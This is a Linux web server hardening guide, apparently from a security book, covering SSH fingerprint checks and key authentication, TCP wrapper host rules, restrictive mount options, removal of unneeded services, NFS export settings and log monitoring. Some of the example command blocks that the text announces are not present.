Sometimes you may need to force the output of the fingerprint_hash algorithm, as ssh-keygen may be displaying it in a different form than it is shown when you try to SSH for the first time. The default when using ssh-keygen to show the key fingerprint is sha256, unless it is an old version, but in order to compare apples with apples you may need to specify md5 if that is what is being shown when you attempt to login. You would do that by issuing the following command:
ssh-keygen -lE md5 -f ssh_host_dsa_key.pub
If that does not work, you can specify md5 from the client side with:
ssh -o FingerprintHash=md5 <your_server>
Alternatively this can be specified in the client's ~/.ssh/config
file as per the following, but I would not recommend this, as using md5 is less secure.
Prior to OpenSSH 6.8, the fingerprint was provided as a hexadecimal md5 hash. Now it is displayed as base64 sha256 by default. You can check which version of SSH you are using with:
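For example:
ssh -V
# prints the OpenSSH client version string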
You can find additional details on the man pages for the options, both ssh-keygen and ssh.
Do not connect remotely and then run the above command, as the machine you are connected to is still untrusted. The command could be dishing you up any string replacement if it is an attacker's machine. You need to run the command on the physical box or get someone you trust (your network admin) to do this and hand you the fingerprint.
Now when you try to establish your SSH connection for the first time, you can check that the remote host is actually the host you think it is by comparing the output of one of the previous commands with what SSH on your client is telling you the remote host's fingerprint is. If it is different, it is time to start tracking down the origin of the host masquerading as the address you're trying to log in to.
Now, when you get the following message when attempting to SSH to your server, due to something or somebody changing the host's key fingerprint:
The same applies. Check that the fingerprint is indeed the intended target hosts key fingerprint. If it is, you can continue to log in.
Now when you type yes
, the fingerprint is added to your client's:
/home/you/.ssh/known_hosts
file,
so that next time you try and login via SSH, your client will already know your server.
There are a bunch of things you can do to minimise SSH being used as an attack vector. Let us walk through some now.
After any changes, restart SSH daemon as root (using sudo) to apply the changes.
You can check the status of the daemon with the following command:
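For example, on a systemd-based Debian install (older installs would use service ssh status instead):
sudo systemctl status ssh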
Configuring which hosts can access your server
This can be done with a firewall, or at a lower level which I prefer. The two files you need to know about are: /etc/hosts.deny
and /etc/hosts.allow
. The names of the files explain what they contain. hosts.deny
contains addresses of hosts which are blocked, hosts.allow
contains addresses of hosts which are allowed to connect.
If you wanted to allow access to the SSH daemon from 1.1.1.x
and 10.0.0.5
, but no others, you would set-up the files like the following:
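A hedged sketch of what that could look like, assuming the standard sshd daemon name recognised by TCP wrappers (the trailing dot in 1.1.1. matches the whole 1.1.1.x network):
# /etc/hosts.deny
ALL: ALL
# /etc/hosts.allow
sshd: 1.1.1. 10.0.0.5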
If you wanted to deny all only to SSH, so that users not listed in hosts.allow
could potentially log into other services, you would set the hosts.deny
up like the following:
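Something like the following, again assuming the sshd daemon name:
# /etc/hosts.deny
sshd: ALL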
There are also commented examples in the above files and check the man page for all of the details.
Changes to the server's /etc/ssh/sshd_config
file
To tighten security up considerably, make the necessary changes to your server's:
/etc/ssh/sshd_config
file.
Start with the changes I list here. When you change things like setting up AllowUsers
or any other potential changes that could lock you out of the server, it is a good idea to be logged in via one shell while you exit another and test it. This way, if you have locked yourself out, you will still be logged in on one shell to adjust the changes you have made. Unless you have a need for multiple users, you can lock it down to a single user. You can even lock it down to a single user from a specific host.
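As a hedged starting point, these are commonly recommended sshd_config directives rather than a definitive list, and the port and user name are placeholders:
Protocol 2
Port 2222
PermitRootLogin no
PasswordAuthentication no
AllowUsers you
MaxAuthTries 3
LoginGraceTime 30
X11Forwarding no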
As you can see, these changes are very simple, but so many do not do it. Every positive security change you make to the low hanging fruit lifts it that little bit higher for the attacker to reach, making it less economical for them.
You can also consider installing and configuring denyhosts
Check SSH login attempts. As root or via sudo, type the following to see all failed login attempts:
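A hedged example, assuming the default Debian auth log location and standard sshd log strings:
grep 'Failed password' /var/log/auth.log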
If you want to see successful logins, enter the following:
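For example (this catches both password and public key acceptances):
grep 'Accepted' /var/log/auth.log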
If you are sending your logs off-site in real-time, it will not matter too much if the attacker tries to cover their tracks by modifying these types of files. If you are checking the integrity of your system files frequently with one of the Host Intrusion Detection Systems (HIDS) we discuss a little further on in this chapter, then you will know you are under attack and will be able to take measures quickly, providing you have someone engaged watching out for these attacks, as discussed in the People chapter of Fascicle 0. If your HIDS is on the same machine that is under attack, then it is quite likely that any decent attacker is going to find it before they start modifying files and somehow render it ineffective. That is where Stealth shines, as it is so much harder to find where it is operating from, if the attacker even knows it is running.
Key-pair Authentication
The details around how the client authenticates to the server are above in part 2 of the SSH Connection Procedure section. This section shows you how to set-up key-pair authentication, as opposed to password authentication.
Make sure you use a long pass-phrase (this is your second factor of authentication) for your key-pair, and store it in a password vault with all your other passwords. You are using a decent password vault, right? If your pass-phrase and private key are compromised, your hardening effort will be softened or compromised.
My feeling after a lot of reading is that currently RSA with large keys (The default RSA size is 2048 bits) is a good option for key-pair authentication. Personally I like to go for 4096 these days.
Create your key-pair if you have not already and set-up key-pair authentication. Key-pair auth is more secure and allows you to log in without a password. Your pass-phrase should be stored in your keyring. You will just need to provide your local password once (each time you log into your local machine) when the keyring prompts for it.
On your client machine that you want to create the key-pair and store them:
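Assuming you want the 4096 bit RSA key discussed above:
ssh-keygen -t rsa -b 4096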
Agree to the location that ssh-keygen
wants to store the keys… /home/you/.ssh
Enter a pass phrase twice to confirm. Keys are now in /home/you/.ssh
Optionally, the new private key can be added to id_rsa.keystore
if it hasn’t been already:
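A hedged example, assuming you want the key loaded into your running SSH agent so the keyring can supply the pass-phrase:
ssh-add ~/.ssh/id_rsa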
Then enter your pass-phrase.
Now we need to get the public key we have just created (~/.ssh/id_rsa.pub
) from our client machine into our server's ~/.ssh/
directory.
You can scp
it, but this means also logging into the server and creating the:
~/.ssh/authorized_keys
file if it does not already exist,
and appending (>>
) the contents of id_rsa.pub to ~/.ssh/authorized_keys
. There is an easier way, and it goes like this, from your client machine:
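Assuming the placeholder user and host names used throughout this section (add -p <port> if you moved SSH off the default port):
ssh-copy-id you@your_server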
This will copy the public key straight into the ~/.ssh/authorized_keys
file on your_server. You may be prompted to type yes
if it is the first time you have connected to the server, telling you that the authenticity of the server you are trying to connect to can not be established, and asking whether you want to continue. Remember I mentioned this above in the Establishing your SSH Servers Key Fingerprint section? Make sure you check the server's key fingerprint and do not just blindly accept it; this is where our security solutions break down… due to human defects.
Also make sure the following permissions and ownership on the server are correct:
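A hedged sketch of the usual values, with the user name as a placeholder:
chown -R you:you ~/.ssh
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys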
You may need to tunnel SSH once the server is placed into the DMZ. Usually this will be mostly set-up on your router. If you are on the outside of your network, you will just SSH to your external IP address.
If you are wanting to SSH from your LAN host to your DMZ web server:
Before you try that though, you will need to set-up the port forwards and add the WAN and/or LAN rule to your router. How you do this will depend on what you are using for a router.
I have blogged extensively over the years on SSH. The Additional Resources chapter has links to my resources for a plethora of information on configuring and using SSH in many different ways.
sshuttle
I just thought I would throw sshuttle in here as well. It has nothing to do with hardening SSH, but it is a very useful tool for tunneling SSH. Think of it as a poor man's VPN, but it does some things better than the likes of OpenVPN, like forcing DNS queries through the tunnel also. It is very simple to run.
As opposed to manually specifying socks and then having to tell your browser to proxy through localhost
and use the same port you defined after the socks (-D
) option, and then having to do the same for any other programmes that want to use the same tunnel:
Dnscrypt can help conceal DNS queries, but that would be more work. Another offering I’ve used is the bitmask VPN client, which does a lot more than traditional VPN clients; bitmask starts an egress firewall that rewrites all DNS packets to use the VPN. Bitmask is sponsored by the LEAP Encryption Access Project and looks very good, and the chaps on the #riseup IRC channel on the indymedia server are really helpful too. Bitmask was working on Debian, Ubuntu, and Mint 17, but not so well on Mint 18 when I tried it, although this will probably change.
All the major hypervisors should provide a way to disable all boot options other than the device you will be booting from. VMware allows you to do this in vSphere Client.
While you are at it, set a BIOS password.
File Permission and Ownership Level
Addressing the first risk as discussed in the “Overly Permissive File Permissions, Ownership and Lack of Segmentation” section of the Identify Risks section:
The first thing to do is locate the files with overly permissive permissions and ownership. Running the suggested tools is a good place to start. From there, following your nose to find any others is a good idea. Then tighten them up so that they conform to the least amount of privilege and ownership necessary in order for the legitimate services/activities to run. Also consider removing any suid
bits on executables chmod u-s <yourfile>
. We also address applying nosuid
to our mounted file systems below, which provides a nice safety net.
Mount Point of the File Systems
Addressing the second risk as discussed in the “Overly Permissive File Permissions, Ownership and Lack of Segmentation” section of the Identify Risks section:
Let us get started with your fstab
.
Make a backup of your /etc/fstab
file before you make changes; this is really important, as it is often really useful to just swap the modified fstab
with the original as you are progressing through your modifications. Read the man page for fstab and also the options section in the mount man page. The Linux File System Hierarchy (FSH) documentation is worth consulting also for directory usages. The following was my work-flow:
Before you modify and remount /tmp
, view what its currently mounted options look like with:
Add the noexec
mount option to /tmp
but not /var
because executable shell scripts such as *pre[inst, rm]
and *post[inst, rm]
reside within /var/lib/dpkg/info
. You can also add the nodev,nosuid
options to /tmp
.
So you should have the following line in /etc/fstab
now looking like this:
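A hedged example of that line, with the UUID as a placeholder and ext4 assumed as the file system type:
UUID=<your-tmp-partition-uuid> /tmp ext4 defaults,nodev,nosuid,noexec 0 2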
Then to apply the new options from /etc/fstab
:
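A remount is enough; a full reboot is not required:
sudo mount -o remount /tmp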
Then by issuing the sudo mount | grep ' /tmp'
command again, you’ll see your new options applied.
You can add the nodev
option to /home
, /opt
, /usr
and /var
also. You can also add the nosuid
option to /home
. You can add ro
to /usr
So you should have the following lines, as well as the above /tmp
in /etc/fstab
now looking like this:
Before you remount the above changes, you can view the options for the current mounts:
Then remount the mounts you have just specified in your fstab
above:
Now have a look at the changed options applied to your mounts:
You can now bind some target mounts onto existing directories. I had only limited success with this technique, so keep reading. The lines to add to the /etc/fstab
are as per the following. The file system type should be specified as none
(as stated in the “The bind mounts” section of the mount man page). The bind
option binds the mount. There was a bug with the suidperl package in Debian where setting nosuid
created an insecurity. suidperl is no longer available in Debian:
Before you remount the above changes, you can view the options for the current mounts:
Then remount the above immediately, thus taking effect before a reboot, which is the safest way, as if you get the mounts incorrect, your system may fail to boot in some cases, which means you will have to boot a live CD to modify the /etc/fstab
, execute the following commands:
Then to pick up the new options from /etc/fstab
:
Now have a look at the changed options applied to your mounts:
For further details consult the remount option of the mount man page.
At any point you can check the options that you have your directories mounted as, by issuing the following command:
As mentioned above, I had some troubles adding these mounts to existing directories; I was not able to get all options applied, so I decided to take another backup of the VM (I would highly advise you to do the same if you are following along) and run the machine from a live CD (Knoppix in my case). I ran Disk Usage Analyzer to work out which sub directories of /var
and /usr
were using how much disk space, to work out how much to reduce the sizes of partitions that /var
and /usr
were mounted on, in order to provide that space to sub directories (/var/tmp
, /var/log
and /usr/share
) on new partitions.
Run gparted and unmount the relevant directory from its partition (/var
from /dev/sda5
, and /usr
from /dev/sda8
in this case). Reduce the size of the partitions by the size of the new partitions you want taken from them. Locate the unallocated space of the size by which you just reduced the partition you were working on, and select New from the context menu. Set the File system type to ext4
and click Add -> Apply All Operations -> Apply. You should now have the new partition.
Now you will need to mount the original partition that you resized and the new partition. Open a terminal with an extra tab. In the left terminal go to where you mounted the original partition (/media/sda5/tmp/
for example), in the right terminal go to where you mounted the new partition (/media/sda11/
for example).
Copy all in current directory of left terminal recursively, preserving all attributes other than hard links.
Once you have confirmed the copy, delete all in /media/sda5/tmp/
Back in gparted, mount /dev/sda1
so we can modify the /etc/fstab
. By running the blkid
command you will be given the UUID for the partition to use in the /etc/fstab
. Modify the /media/sda1/etc/fstab
to look similar to the below sample fstab
. Do the same for /var/log
and /usr/share
.
If you added any of these mounts on the machine while it was running, you could use the following command to mount them all.
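That is simply:
sudo mount -a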
Once you have booted into your machine again, you can perform some tests.
Test your noexec
by putting the following script in /var
, and changing the permissions on it:
Copying it to /var/tmp
, and /var/log
, then try running each of them. You should only be able to run the one that is in the directory mounted without the noexec
option. My file “kimsTest” looks like this:
Try running them:
If you set /tmp
with noexec
and / or /usr
with read-only (ro
), then you will also need to modify, or create if it does not exist, the file /etc/apt/apt.conf
and also the referenced directory that apt will write to. The file could look something like the following:
You can spend quite a bit of time experimenting with your mounts and testing. It is well worth locking these down as tightly as you can, make sure you test properly before you reboot, unless you are happy modifying things further via a live CD. This set-up will almost certainly not be perfect for you, there are many options you can apply, some may work for you, some may not. Be prepared to keep adjusting these as time goes on, you will probably find that something can not execute where it is supposed to, or some other option you have applied is causing some trouble. In which case you may have to relax some options, or consider tightening them up more. Good security is always an iterative approach. You can not know today, what you are about to learn tomorrow.
You can also look at enabling a read-only /
mount
Also consider the pros and cons of increasing your shared memory (via /run/shm
) vs not increasing it.
Check out the Additional Resources chapter for extra resources in working with your mounts.
If port mapper is not installed (the default on a Debian web server), we do not need to remove it. Recent versions of Debian will use the portmap replacement, rpcbind,
instead. If you find port mapper is installed, you do not need it on a web server, and if you are hardening a file server, you may require rpcbind
. For example, there are two packages required if you want to support NFS on your server: nfs-kernel-server and nfs-common; the latter has a dependency on rpcbind
.
The portmap
service (version 2 of the port mapper protocol) would convert RPC program numbers into TCP/IP (or UDP/IP) protocol port numbers. When an RPC server (such as NFS prior to v4) was started, it would instruct the port mapper which port number it was listening on, and which RPC program numbers it was prepared to serve. When clients wanted to make an RPC call to a given program number, the client would first contact the portmap service on the server to enquire which port number its RPC packets should be sent to. Rpcbind,
which uses version 3 and 4 of the port mapper protocol (called the rpcbind protocol) does things a little differently.
You can also stop portmap
responses by modifying the two below hosts files like so:
but ideally, if you do need the port mapper running, consider upgrading to rpcbind
for starters, then check the rpcbind
section below for countermeasures.
The above changes to the two hosts files would be effective immediately. A restart of the port mapper is not required in this case.
There are further details around the /etc/hosts.[deny & allow]
files in the NFS section.
This will probably show that Exim4 is currently installed.
If so, before exim4 is disabled, a netstat -tlpn
will produce output similar to the following:
Which shows that exim4 is listening on localhost and is not publicly accessible. Nmap confirms this, but we do not need it, so let's disable it. You could also use the more modern ss program too. You may also notice monit
and nodejs
listening in these results. Both monit
and our nodejs
application is set-up under the Proactive Monitoring section later in this chapter.
When a run level is entered, init
executes the target files that start with K
, with a single argument of stop, followed by the files that start with S
with a single argument of start. So by renaming /etc/rc2.d/S15exim4
to /etc/rc2.d/K15exim4
you are causing init
to run the service with the stop argument when it moves to run level 2. Just for interest's sake, the scripts at the end of the links with the lower numbers are executed before scripts at the end of links with the higher two digit numbers. Now go ahead and check the directories for run levels 3-5 as well, and do the same. You will notice that all the links in /etc/rc0.d/
(which are the links executed on system halt) start with K
. Is it making sense?
Follow up with another sudo netstat -tlpn
:
And that is all we should see. If you don’t have monit or node running, you won’t see them either of course.
Later on I started receiving errors from apt-get update && upgrade
:
Removing the following packages will solve that:
If Network Information Service (NIS) or the replacement NIS+ is installed, ideally you will want to remove it. If you needed centralised authentication for multiple machines, you could set-up an LDAP server and configure PAM on your machines in order to contact the LDAP server for user authentication. If you are in the cloud, you could look at using the platform's directory service, such as AWS Directory Service. We may have no need for distributed authentication on our web server at this stage.
Check to see if NIS is installed by running the following command:
NIS is not installed by default on a Debian web server, so in this case, we do not need to remove it.
If the host you were hardening had the role of a file server and was running NFS, and you need directory services, then you may need something like Kerberos and/or LDAP. There is plenty of documentation and tutorials on Kerberos and LDAP and replacing NIS with them.
One of the differences between the now deprecated portmap
service and rpcbind
is that portmap
returns port numbers of the server programs and rpcbind returns universal addresses. This contact detail is then used by the RPC client to know where to send its packets. In the case of a web server we have no need for this.
Spin up Nmap:
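A hedged example, scanning all TCP ports with service fingerprinting (the target address is a placeholder):
nmap -p- -sV <your_server>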
Because I was using a non-default port for SSH, nmap does not announce it correctly, although as shown in the Penetration Testing section of the Processes and Practises chapter of Fascicle 0, using service fingerprinting techniques, it is usually easy to find out what is bound to the port. Tools like Unhide will also show you hidden processes bound to hidden ports.
To obtain a list of currently running servers (determined by LISTEN
) on our web server.
or
As per the previous netstat outputs, we see that sunrpc
is listening on a port and was started by rpcbind
with the PID of 1498
. Now Sun Remote Procedure Call is running on port 111
(The same port that portmap
used to listen on). Netstat can tell you the port, but we have confirmed it with the nmap scan above. Rpcbind is used by NFS (as mentioned above, rpcbind
is a dependency of nfs-common) and as we do not need or want our web server to be a NFS file server, we can get rid of the rpcbind
package. If for whatever reason you do actually need the port mapper, then make sure you lock down which hosts/networks it will respond to by modifying the /etc/hosts.deny
and /etc/hosts.allow
as seen in the NFS section.
Shows us that rpcbind
is installed and gives us other details. Now if you have been following along with me and have made the /usr
mount read only, some stuff will be left behind when we try to purge:
Following are the outputs of interest. Now if you have your mounts set-up correctly, you will not see the following errors; if however you do see them, then you will need to spend some more time modifying your /etc/fstab
as discussed above:
If you received the above errors, run the following command again:
Which would yield a result of pH
, that is, a desired action of (p)urge and a package status of (H)alf-installed. If you want to continue the removal of rpcbind
, try the purge
, dpkg-query
and netstat
commands again to make sure rpcbind
is gone and of course no longer listening.
Also you can remove unused dependencies now, after you get the following message:
Because I am paranoid and have made stupid mistakes with autoremove years ago (and that pain has stuck with me ever since), I first simulate what is going to be removed. I auto-removed a meta-package which depended on many other packages. A subsequent autoremove for packages that had a sole dependency on the meta-package meant they would be removed too. Yes, it was a painful experience. /var/log/apt/history.log
has your recent apt history. I used this to piece back together my system.
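A hedged example of the simulation run (the -s switch tells apt-get to only report what it would remove):
apt-get autoremove -s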
Then follow up with the real thing… Just remove the -s
and run it again. Just remember, the fewer packages your system has, the less code there is for an attacker to exploit.
The port mapper should never be visible from a hostile network, especially the internet. The same goes for all RPC servers due to reflected and often amplified DoS attacks.
You can also stop rpcbind
responses by modifying the two below hosts files like so:
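A hedged sketch, assuming the rpcbind daemon name recognised by TCP wrappers and that only localhost should receive responses:
# /etc/hosts.deny
rpcbind: ALL
# /etc/hosts.allow
rpcbind: 127.0.0.1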
The above changes to the two hosts files would be effective immediately. A restart of the port mapper would not be required in this case.
There are further details around the /etc/hosts.[deny & allow]
files in the NFS section that will help you fine tune which hosts and networks should be permitted to query and receive response from the port mapper. Be sure to check them out if you are going to retain the port mapper, so you do not become a victim of a reflected amplified DoS attack, and that you keep any RPC servers that you may need exposed to your internal clients. You can test this by running the same command that we did in the Identify Risks section.
This time, with the two hosts files set-up as above, the results should look like the following:
You will notice in the response as recorded by Wireshark, that the length is now smaller than the request:
Do not use Telnet for your own systems; SSH provides encrypted shell access and was designed to replace Telnet. Use it instead; there are also many ways you can harden SSH.
Telnet installed?
Telnet gone?
I do not believe there is any place to use FTP, even on a network that you think is safe. The first problem here, if you are still thinking like this, is that the network you think may be safe is a perfect place for someone to exploit; this stems from the Fortress Mentality, as discussed in the Physical and Network chapters.
Ftp installed?
Ftp gone?
Let us take a look at FTPS, SFTP and SCP
FTPS is FTP over TLS with some issues
There were two separate methods to invoke FTPS client security, defined by which port they initiate communications with:
Implicit: the FTPS client is expected to immediately challenge the server with a TLS ClientHello
message before any other FTP commands are sent by the client. If the FTPS server does not receive the initial TLS ClientHello
message first, the server should drop the connection.
Implicit also requires that all communications of the FTP session be encrypted.
In order to maintain compatibility with existing FTP clients, implicit FTPS was expected to also listen on the command / control channel using port 990/TCP, and the data channel using port 989/TCP. This left port 21/TCP for legacy no encryption communication. Using port 990 implicitly implied encryption was mandatory.
This is the earlier and mostly considered deprecated method.
Explicit: this method also allows the FTPS client to decide whether they want to encrypt nothing, encrypt just the command channel (which the credentials are sent over), or encrypt everything.
So as you can see, it is quite conceivable that a user may become confused as to whether encryption is on, is not on, which channel it is applied to and not applied to. The user has to understand the differences between the two methods of invoking security, not invoking it at all, or only on one of the channels.
One thing that you really do not want when it comes to privacy, is confusion. When it comes to SFTP or any protocol over SSH, everything is encrypted, simple as that.
Similar to a web server serving HTTPS with a public key certificate, an FTPS server will also respond with its public key certificate (keeping its private key private). The public key certificate it responds with needs to be generated from a Certificate Authority (CA), whether it is one the server administrator has created (self signed) or a public “trusted” CA (often paid for), the CA (root) certificate must be copied and/or reside locally to the FTPS client. The checksum of the CA (root) certificate will need to be verified also.
If the FTPS client does not already have the CA (root) certificate when the user initiates a connection, the FTPS client should generate a warning due to the fact that the CA (root) certificate is not yet trusted.
This process is quite complicated and convoluted as opposed to how FTP over SSH works.
SFTP is FTP over SSH
As I have already detailed in the section SSH Connection Procedure, the SSH channel is first set-up, thus the client is already authenticated, and their identity is available to the FTP protocol or any protocol wishing to use the encrypted channel. The public key is securely copied from the client to the server out-of-band. If the configuration of SSH is carried out correctly and hardened as I detailed throughout the SSH countermeasures section, the SFTP and any protocol for that matter over SSH has the potential for greater security than those using the Trusted Third Party (TTP) model, which X.509 certificates (utilised in FTPS, HTTPS, OpenVPN, not the less secure IPSec) rely on.
Why is SSH capable of a higher level of security?
With SSH, you copy the public key that you created on your client using ssh-copy-id
to the server. There are no other parties involved. Even if the public key gets compromised, unless the attacker has the private key, which never leaves the client, they cannot be authenticated to the server and they cannot MItM your SSH session, as that would issue a warning due to the key fingerprint of the MItM no longer matching that in your known_hosts
file. Even if an attacker managed to get near your private key, SSH will not run if the permissions of the ~/.ssh/
directory and the files within are too permissive, so the user knows immediately anyway. Even then, if somehow the private key was compromised, the attacker still needs the pass-phrase. SSH is a perfect example of defence in depth.
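A minimal sketch of that out-of-band key copy, assuming an Ed25519 key and a placeholder user and host:

    # On the client: generate a key pair (the private key never leaves this machine)
    ssh-keygen -t ed25519
    # Copy the public key to the server
    ssh-copy-id -i ~/.ssh/id_ed25519.pub you@your-server
    # Keep the permissions tight, or SSH will refuse to play
    chmod 700 ~/.ssh && chmod 600 ~/.ssh/id_ed25519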
With X.509 certificates, you rely on (trust) the third party (the CA). When the third party is compromised (and this happens frequently), many things can go wrong, some of which are discussed in the X.509 Certificate Revocation Evolution section of the Network chapter. The compromised CA can start issuing certificates to malicious entities. All that may be necessary at this point is for your attacker to poison your ARP cache if you are relying on IP addresses, or do the same plus poison your DNS. This attack is detailed under the Spoofing Website section in the Network chapter, was demoed at WDCNZ 2015, and also links to a video.
The CA root certificate must be removed from all clients and you will need to go through the process of creating / obtaining a new certificate with a (hopefully) non compromised CA. With SSH, you only have to trust yourself, and I have detailed what you need to know to make good decisions in the SSH section.
SSH not only offers excellent security, but is also extremely versatile.
SCP, or Secure Copy, leverages the security of SSH and provides simple copy to and from; so once you have SSH set up and hardened, you are in good stead to be pulling and pushing files around your networks securely. The SFTP protocol provides remote file system like capabilities, such as remote file deletion, directory listings, and resuming of interrupted transfers. If you do not require the additional features of (S)FTP, SCP may be a good option for you. Like SSH, SCP does not have native platform support on Windows, although Windows support is available and easy enough to set up, as I have done many times.
Any features that you may think are missing by using SCP rather than SFTP are more than made up for simply by using SSH, which in itself provides a complete remote Secure SHell and is very flexible in how you can use it.
Another example is using Rsync over SSH, which is an excellent way to sync files between machines. Rsync will only copy the files that have changed since the last sync, so this can be extremely quick.
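A hedged example of syncing a directory over SSH (paths and host are placeholders):

    # -a preserve permissions/times, -v verbose, -z compress, -e use SSH as the transport
    rsync -avz -e ssh /local/dir/ you@your-server:/remote/dir/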
For Windows machines, I also run all of my RDP sessions over SSH, see my blog post for further details: https://blog.binarymist.net/2010/08/26/installation-of-ssh-on-64bit-windows-7-to-tunnel-rdp/
So there is no reason to not have all of your inter-machine communications encrypted, whether they be on the internet, or on what you think is a trusted LAN. This is why firewalls are just another layer of defence and nothing more.
You should not need NFS running on a web server. The packages required for the NFS server to be running are nfs-kernel-server, which has a dependency on nfs-common (common to server and clients), which also has a dependency of rpcbind.
NFSv4 (December 2000) no longer requires the portmap service. Rpcbind is the replacement.
Issue the following command to confirm that the NFS server is not installed:
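Something along these lines will do the job:

    dpkg -l | grep nfs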
This may show you that you have nfs-common installed, but ideally you do not want nfs-kernel-server installed. If it is, you can just:
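Again hedged, assuming apt:

    sudo apt-get purge nfs-kernel-server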
If you do need NFS running for a file server, the usual files that will need some configuration will be the following:
- /etc/exports (the only file required to actually export your shares)
- /etc/hosts.allow
- /etc/hosts.deny
Check that these files' permissions are 644, owned by root, with a group of root or sys.
The above hosts.[allow | deny]
provide the accessibility options. You really need to lock these down if you intend to use NFS in a somewhat secure fashion.
The exports man page has all the details (and some examples) you need, but I will cover some options here.
In the below example, /dir/you/want/to/export is the directory (and its sub-directories) that you want to share; this could also be an entire volume, but keeping these as small as possible is a good start. machine1, machine2 and machinen are the machines that you want to have access to the specified exported share. These can be specified by their DNS names or IP addresses; using IP addresses can be a little more secure and reliable than using DNS names. If using DNS, make sure the names are fully qualified domain names.
Some of the more important options are:
- ro: the client will not be able to write to the exported share (this is the default), and I do not use rw, which allows the client to also write.
- root_squash: this prevents remote root users that are connected from also having root privileges, assigning them the user ID of nfsnobody, thus effectively “squashing” the power of the remote user to the lowest privileges possible on the server. Or even better, use all_squash.
- no_subtree_check: from newer releases of nfs-utils onwards, no_subtree_check is the default. subtree_check was the previous default, which would cause a routine to verify that files requested by the client were in the appropriate part of the volume. The subtree_check caused more issues than it solved.
- fsid: used to specify the file system that is exported; this could be a UUID, or the device number. NFSv4 clients have the ability to see all of the exports served by the NFSv4 server as a single file system. This is called the NFSv4 pseudo-file system. This pseudo-file system is identified as a single, real file system, identified at export with the fsid=0 option.
- anonuid and anongid: explicitly set the uid and gid of the anonymous account. This option makes all requests look like they come from a specific user. By default the uid and gid of 65534 is used by exportfs for squashed access. These two options allow us to override the uid and gid values.
The following is one of the configs I have used on several occasions:
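A sketch only, using the options just discussed; paths, hosts and ids are placeholders:

    # /etc/exports
    /dir/you/want/to/export machine1(ro,fsid=0,all_squash,no_subtree_check,anonuid=1001,anongid=1001) machine2(ro,fsid=0,all_squash,no_subtree_check,anonuid=1001,anongid=1001)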
Then on top of this sort of configuration, you need to make sure that the local server mounts are as restrictive as we set-up in the “Lock Down the Mounting of Partitions” section, and also the file permissions for other, at the exported level recursively, are as restrictive as practical for you. Now we are starting to achieve a little defence in depth.
Now if you have been following along with the NFS configuration because you are working on a file server rather than a web server, let us just take this a little further with some changes to /etc/hosts.deny
and /etc/hosts.allow
.
The access control language used in these two files is the same as each other, just that hosts.deny
is consulted for which entities to deny to which services, and hosts.allow
for which to allow for the same.
Each line of these two files specifies (in the simplest form) a single service or process and a set of hosts in numeric form (not DNS). In the more complex forms, daemon@host and user@host.
You can add ALL:ALL
to your hosts.deny
, but if you install a new service that uses these files, then you will be left wondering why it is not working. I prefer to be more explicit, but it is up to you.
Prior to NFSv4 to achieve the same results, these two files would need to contain something similar to the following. NFSv4 has no interaction with these additional daemons, as their functionality has been incorporated into the version 4 protocol and NFS (v4) listens on the well known TCP port 2049:
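Something along the following lines, with a placeholder internal network:

    # /etc/hosts.deny
    portmap: ALL
    lockd: ALL
    mountd: ALL
    rquotad: ALL
    statd: ALL

    # /etc/hosts.allow
    portmap: 192.168.0.0/24
    lockd: 192.168.0.0/24
    mountd: 192.168.0.0/24
    rquotad: 192.168.0.0/24
    statd: 192.168.0.0/24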
You can reload your config, that is re-export your exports /etc/exports
with a restart of NFS:
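Hedged, assuming the Debian nfs-kernel-server package:

    sudo service nfs-kernel-server restart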
Although that is not really necessary; a simple re-export (exportfs -ra) is sufficient. Both the exports and exportfs man pages are good for additional insight.
Then run another showmount
to audit your exports:
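For example (the server name is a placeholder):

    # Show the export list of the NFS server
    showmount -e your-file-server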
A client communicates with the server's mount daemon. If the client is authorised, the mount daemon then provides the root file handle of the exported filesystem to the client, at which point the client can send packets referencing the file handle. Making correct guesses of valid file handles can often be easy. The file handles consist of:
- The filesystem id (visible in /etc/fstab, which is usually world readable, or by running blkid).
- The inode number. The / directory on the standard Unix filesystem has the inode number of 2, /proc is 1. You can see these with ls -id <target dir>.
- The inode generation count. Files in / are not deleted very often, so the count remains small and reasonably guessable. Using a tool such as istat can provide these details if you want to have a play.
Thus allowing a spoofing type of attack, which has been made more difficult by the following measures:
exportfs is run with the secure option, requiring that requests originate from a privileged port (<1024), so whoever attempts to mount an export must be root. We can see that this is the case with netstat, or with the newer Socket Statistics (ss):
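A sketch of checking the ports on established NFS connections; the filters are standard netstat/ss usage, the interpretation is up to you:

    # The netstat view
    netstat -tn | grep 2049
    # Established NFS (port 2049) connections, with local and peer ports visible
    ss -tn '( sport = :2049 or dport = :2049 )'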
Prior to this spoofing type vulnerability largely being mitigated, one option that was used was to randomise the generation number of every inode on the filesystem using a tool fsirand
, which was available for some versions of Unix, although not Linux. This made guessing the generation number harder, thus mitigating these spoofing type of attacks. This would usually be scheduled to run say once a month.
fsirand would be run on the / directory while in single-user mode, or on un-mounted filesystems: run fsck, and if no errors were produced, run fsirand.
Some Useful Visibility Commands
Check who is currently logged in to your server and what they are doing:
who and w
Check who has recently logged into your server, I mentioned this command previously:
last -ad
Check which user has failed login attempts, mentioned this command previously:
lastb -ad
Check the most recent login of all users, or of a given user. lastlog sources its data from the binary file /var/log/lastlog:
lastlog
I recently performed an in-depth evaluation of a small collection of logging and alerting offerings, the choice of which candidates to bring into the in-depth evaluation came from an initial evaluation.
It is very important to make sure you have reliable and all-encompassing logging to an off-site location. This way attackers will have to also compromise that location in order to effectively cover their tracks.
You can often see in logs when access has been granted to an entity, and when files have been modified or removed. Become familiar with what your logs look like and which events create which messages. A good sys-admin can sight logs and quickly see anomalies. If you keep your log aggregator open, at least whenever you are working on the servers that generate the events, you will quickly get used to recognising which events cause which log entries.
Alerting should also be set up for expected and unexpected actions, as well as a dead man's snitch.
Make sure you have reviewed who can write and read your logs, especially those created by the auth
facility, and make any modifications necessary to the permissions.
In order to have logs that provide the information you need, you need to make sure the logging level is set to produce the required amount of verbosity, that time stamps are synchronised across your network, and that you archive the logs for long enough to be able to diagnose malicious activity and movements across the network.
Being able to rely on the times of events on different network nodes is essential to tracking an attacker's movements through your network. I discuss setting up Network Time Protocol (NTP) on your networked machines in the Network chapter.
Simple Log Watcher matches on patterns that you define in ~/.swatchrc and performs any action you can script. You can define different message types with different font styles and colours. Simple Log Watcher can tail the log file, so your actions will be performed in real-time. For each log file you want to monitor, you need a separate swatchrc file and a separate instance of Simple Log Watcher, as it only takes one file argument. If you want to monitor a lot of log files without aggregating them, this could get messy.
See the Additional Resources chapter.
The main configuration file is /etc/logcheck/logcheck.conf. You can specify which log files to review within /etc/logcheck/logcheck.logfiles. Logcheck is easy to install and configure.
GNU syslogd
